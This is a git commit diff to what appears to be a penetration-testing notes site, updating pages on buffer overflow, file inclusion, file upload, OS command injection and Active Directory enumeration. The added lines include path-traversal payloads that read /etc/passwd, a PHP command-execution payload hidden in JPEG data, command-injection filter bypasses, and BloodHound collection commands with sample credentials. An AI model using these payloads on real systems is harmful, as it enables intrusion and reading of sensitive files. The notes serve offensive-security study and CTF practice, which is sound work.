updated some techniques

hdks-bug · hdks-bug · commit bda6807f33a7 · 2024-12-12T18:05:31.000+09:00
diff --git a/src/exploit/binary-exploitation/method/binary-exploitation-with-buffer-overflow.md b/src/exploit/binary-exploitation/method/binary-exploitation-with-buffer-overflow.md
@@ -4,7 +4,7 @@ description: Buffer overflow occurs when a program attempts to write more data t
 tags:
     - Reverse Engineering
 refs:
-date: 2023-08-14
+date: 2024-12-12
 draft: false
 ---
 
@@ -172,10 +172,10 @@ r.interactive()
 
 <br />
 
-## Shellcode
+## Shellcode Injection
 
-We can create the crafted shell code and override the address to execute the shell code.  
-Use **Pwntools** to create the shell code.
+We can create the crafted shellcode and override the address to execute the shellcode.  
+Use **Pwntools** to create the shellcode.
 
 ```python
 from pwn import *
diff --git a/src/exploit/web/security-risk/file-inclusion.md b/src/exploit/web/security-risk/file-inclusion.md
@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
-date: 2024-11-08
+date: 2024-12-12
 draft: false
 ---
 
@@ -16,6 +16,7 @@ draft: false
 ?page=/etc/passwd
 ?page=../../../../etc/passwd
 ?page=../../../../../etc/passwd
+?page=..././..././..././..././etc/passwd
 ?page=..//..//..//..//..//etc/passwd
 ?page=....//....//....//....//etc/passwd
 ?page=....//....//....//....//....//....//etc/passwd
diff --git a/src/exploit/web/security-risk/file-upload-attack.md b/src/exploit/web/security-risk/file-upload-attack.md
@@ -6,7 +6,7 @@ tags:
 refs:
     - https://docstore.mik.ua/orelly/web2/wdesign/ch19_01.htm
     - https://saadahmedx.medium.com/exploiting-auto-save-functionality-to-steal-login-credentials-bf4c7e1594da
-date: 2024-10-25
+date: 2024-12-12
 draft: false
 ---
 
@@ -250,6 +250,25 @@ RIFF????WAVE
 
 <br />
 
+## Combine payload into image file
+
+The payload can be executed by combining into an image file data.  
+For example, generate a blank image file at first:
+
+```bash
+convert -size 32x32 xc:white test.jpg
+```
+
+And then we can put our payload to the end of the image data:
+
+```txt
+ÿØÿàJFIFHHÿÛC
+ $.' ",#(7),01444'9=82<.342ÿÀ ÿÄÿÄÿÚ?
+<?php echo system("whoami");?>
+```
+
+<br />
+
 ## Zip
 
 If target website restricts uploads to zip files only, the website (server) may unzip uploaded files internally and displays the result of decompressed file somewhere e.g. `/upload/example.txt`.
diff --git a/src/exploit/web/security-risk/os-command-injection.md b/src/exploit/web/security-risk/os-command-injection.md
@@ -6,7 +6,7 @@ tags:
     - Reverse Shell
     - Web
 refs:
-date: 2024-10-25
+date: 2024-12-12
 draft: false
 ---
 
@@ -38,6 +38,8 @@ If the payload includes whitespaces (**' '**), we need to change it to **'+'** o
 /?cmd=ls ..
 /?cmd=ls ../
 /?cmd=ls /home
+<!-- Comment out at the end to ignore subsequent command/code. -->
+?cmd=ls /home #
 
 /?cmd=`ping -c 1 10.0.0.1`
 
@@ -85,6 +87,20 @@ We may be able to bypass specific character filter by encoding them.
 
 <br />
 
+## Null-terminator
+
+Sometimes, we need to put a null-terminator to ignore subsequent code given by the target application.
+
+```bash
+# URL encoding (%00)
+?cmd=ls /home%00
+# Escape sequence (\0, \00)
+?cmd=ls /home\0
+?cmd=ls /home\00
+```
+
+<br />
+
 ## Bypass Whitespace Filter
 
 Reference: [https://www.ctfnote.com/web/os-command-injection/whitespace-bypass](https://www.ctfnote.com/web/os-command-injection/whitespace-bypass)
diff --git a/src/exploit/windows/active-directory/index.md b/src/exploit/windows/active-directory/index.md
@@ -8,7 +8,7 @@ tags:
 refs:
     - https://tryhackme.com/room/adenumeration
     - https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
-date: 2024-12-06
+date: 2024-12-12
 draft: false
 ---
 
@@ -32,6 +32,7 @@ The following command starts the Docker Compose of the BloodHound.
 
 ```bash
 curl -L https://ghst.ly/getbhce > docker-compose.yml
+sudo docker-compose down -v # If you want to reset the password of BloodHound...
 sudo docker-compose pull && sudo docker-compose up
 ```
 
@@ -45,32 +46,42 @@ export BLOODHOUND_HOST=10.0.0.1
 export BLOODHOUND_PORT=8090
 ```
 
-### 2. Collect Data with BloodHound.py
+### 2. Collect Data
 
-Here we use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).  
-Install it as follow:
+- **Option1. Using NetExec**
 
-```sh
-python3 -m venv venv
-source venv/bin/activate
-pip3 install bloodhound
-bloodhound-python -h
-```
+    If you already have `NetExec` in your machine, I think it is the most easiest way.
 
-Then
+    ```sh
+    netexec ldap <target-ip> -d example.local -u username -p password --dns-server <target-ip> --bloodhound -c All
+    ```
 
-```bash
-# -d: Domain
-# -u: Username
-# -p: Password
-# -dc: Domain Controller
-# -c all: Collect all data
-# -ns: Alternate the nameserver
-bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local
-
-# If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
-sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
-```
+- **Option2. Using BloodHound.py**
+
+    We can also use [BloodHound.py](https://github.com/dirkjanm/BloodHound.py).  
+    Install it as follow:
+
+    ```sh
+    python3 -m venv .venv
+    source .venv/bin/activate
+    pipx install bloodhound # or using 'pip3' instead of 'pipx'
+    bloodhound-python -h
+    ```
+
+    Then collect data:
+
+    ```bash
+    # -d: Domain
+    # -u: Username
+    # -p: Password
+    # -dc: Domain Controller
+    # -c all: Collect all data
+    # -ns: Alternate the nameserver
+    bloodhound-python -d example.local -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc dc.example.local -c all -ns ns.example.local
+
+    # If we cannot resolve the domain, try dnschef (https://github.com/iphelix/dnschef) to create a fake DNS by proxy.
+    sudo python3 dnschef.py --fakeip <target-ip> --nameserver <target-ip>
+    ```
 
 ### 3. Upload Collected Data
 
diff --git a/src/exploit/windows/privilege-escalation/index.md b/src/exploit/windows/privilege-escalation/index.md
@@ -8,7 +8,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
     - https://learn.microsoft.com/en-us/powershell/scripting/samples/working-with-registry-keys?view=powershell-7.3
-date: 2024-12-06
+date: 2024-12-12
 draft: false
 ---
 
@@ -252,7 +252,6 @@ We might be able to find interesting information about users by checking histori
 VSS coordinates the actions that  are required to create a consistent a shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
 
 ```powershell
-vssadmin
 vssadmin list shadows
 vssadmin list volumes
 ```
